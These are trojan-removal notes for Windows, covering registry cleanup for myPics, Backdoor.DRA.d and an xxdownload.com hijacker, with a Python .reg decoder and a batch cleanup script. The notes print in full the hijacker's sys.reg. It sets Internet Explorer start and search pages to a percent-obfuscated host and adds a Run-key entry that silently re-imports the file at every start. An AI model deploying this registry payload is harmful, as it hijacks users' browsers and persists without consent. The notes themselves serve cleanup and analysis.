
Notes about removing some Trojans from your System
--------------------------------------------------
(c) by ROSE SWE, Dipl.-Ing. Ralph Roth

myPics:
~~~~~~~

 In WIN.INI, remove c:\...\RegistryReminder.exe from RUN= ;
 c:\...\BuddyList.exe from LOAD=. 

 In SYSTEM.INI, remove SCRNSAVE.EXE=c:\...\WinSaver.exe 

 Use REGEDIT to search & remove "WinProfile"="C:\Command.exe" from 
 Registry Key:
   (My Computer)
   \HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Backdoor.DRA.d:
~~~~~~~~~~~~~~~

 Delete <windir>\sndctl32.exe
 In the Registry key
   [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
 the value "Shell"="explorer.exe sndctl32.exe" has the "sndctl32.exe" entry
 appended; remove that entry so the value reads "Shell"="explorer.exe" again.


xxdownload.com Trojan
~~~~~~~~~~~~~~~~~~~~~

Sets the IE start page (and search pages) and re-registers itself at every system start by silently importing sys.reg via "regedit -s sys.reg" (the "sys" entry in the Run key below).

sys.reg:
REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://%6E%6C%63%72%65%75%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=420"
"HOMEOldSP"="http://%6E%6C%63%72%65%75%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=420"
"Search Bar"="http://%6E%6C%63%72%65%75%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=420"
"Search Page"="http://%6E%6C%63%72%65%75%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=420"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://%6E%6C%63%72%65%75%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=420"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://%6E%6C%63%72%65%75%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=420"
"HOMEOldSP"="http://%6E%6C%63%72%65%75%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=420"
"Search Bar"="http://%6E%6C%63%72%65%75%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=420"
"Search Page"="http://%6E%6C%63%72%65%75%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=420"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://%6E%6C%63%72%65%75%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=420"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"PrivacyAdvanced"=dword:00000001
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"sys"="regedit -s sys.reg"

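The URLs in sys.reg are percent-encoded so the hijack host is not obvious when reading the file. The following script is an added example, not part of the ROSE SWE notes: it parses a REGEDIT4 file, percent-decodes the Internet Explorer start/search values to reveal the real destination, and flags the Run entry that re-imports the file at every start. The sample .reg text is constructed from the entries listed above; the function and variable names are this example's own.

```python
"""Parse a REGEDIT4 .reg file and surface browser-hijack and persistence entries.

Added example (not part of the original ROSE SWE notes). The sample below is
reconstructed from the sys.reg entries listed in the notes.
"""
import re
from urllib.parse import unquote, urlsplit

# Sample .reg content (constructed from the entries in the notes above).
SAMPLE_REG = r"""REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://%6E%6C%63%72%65%75%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=420"
"Search Bar"="http://%6E%6C%63%72%65%75%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=420"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"PrivacyAdvanced"=dword:00000001
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"sys"="regedit -s sys.reg"
"""

# IE value names that start-page/search hijackers typically overwrite.
IE_URL_VALUES = {"start page", "homeoldsp", "search bar", "search page", "searchassistant"}

KEY_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^"([^"]+)"=(.*)$')


def parse_reg(text):
    """Return (key, value_name, data) triples from REGEDIT4-style text."""
    entries = []
    key = None
    for line in text.splitlines():
        line = line.strip()
        m = KEY_RE.match(line)
        if m:
            key = m.group(1)          # a [KEY] header starts a new key section
            continue
        m = VALUE_RE.match(line)
        if m and key is not None:
            name, data = m.group(1), m.group(2)
            if data.startswith('"') and data.endswith('"'):
                data = data[1:-1]     # string value: strip surrounding quotes
            entries.append((key, name, data))
    return entries


def decode_url(data):
    """Percent-decode a string value so an obfuscated URL becomes readable."""
    return unquote(data)


def find_hijack(text):
    """Return findings as (kind, key, value_name, decoded_data, host) tuples.

    kind is "ie_url" for rewritten IE start/search values (host filled in) and
    "persistence" for a Run entry that re-imports a .reg file via regedit.
    """
    findings = []
    for key, name, data in parse_reg(text):
        if "internet explorer" in key.lower() and name.lower() in IE_URL_VALUES:
            url = decode_url(data)
            findings.append(("ie_url", key, name, url, urlsplit(url).hostname))
        elif key.lower().endswith("\\currentversion\\run") and "regedit" in data.lower():
            findings.append(("persistence", key, name, data, None))
    return findings


if __name__ == "__main__":
    for kind, key, name, data, host in find_hijack(SAMPLE_REG):
        print(f"{kind:12} {name!r} in [{key}] -> {data}" + (f" (host {host})" if host else ""))
```

Running it on the sample prints the decoded start/search URLs with their host and the "sys" Run entry; pointing it at a real .reg file (read the file into a string first) shows at a glance which IE values were hijacked and which Run value to delete before removing the file.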

KillxxDownload.bat:

REM remove the Run entry first, so sys.reg is not re-imported on the next start
reg delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "sys" /f
REM reset the hijacked IE start/search values (IE falls back to its defaults)
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "HOMEOldSP" /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Search Bar" /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Search Page" /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Search" /v "SearchAssistant" /f
reg delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /f
reg delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main" /v "HOMEOldSP" /f
reg delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main" /v "Search Bar" /f
reg delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main" /v "Search Page" /f
reg delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search" /v "SearchAssistant" /f
REM finally delete the .reg file itself (path needs the closing % and a backslash)
del %WINDIR%\sys.reg